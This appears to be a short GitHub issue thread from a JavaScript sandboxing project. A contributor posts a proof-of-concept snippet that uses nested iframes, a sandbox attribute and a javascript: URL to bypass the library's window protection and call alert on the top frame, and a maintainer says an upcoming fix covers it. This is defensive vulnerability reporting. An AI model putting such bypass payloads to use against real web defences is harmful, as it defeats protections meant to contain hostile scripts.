Bypass using iframe sandbox

[mmndaniel]

var d = document.createElement('div');
document.body.appendChild(d);
d.innerHTML =  `<iframe
	srcdoc="<iframe sandbox='allow-same-origin' src='javascript:alert(1)'></iframe><script>frames[0].alert.call(top, 1);</script>"
</iframe>`;

Same idea as #90, just using sandbox to break the internal SNOW_WINDOW call :)

[weizman]

seems like #101 will fix this issue as well as #93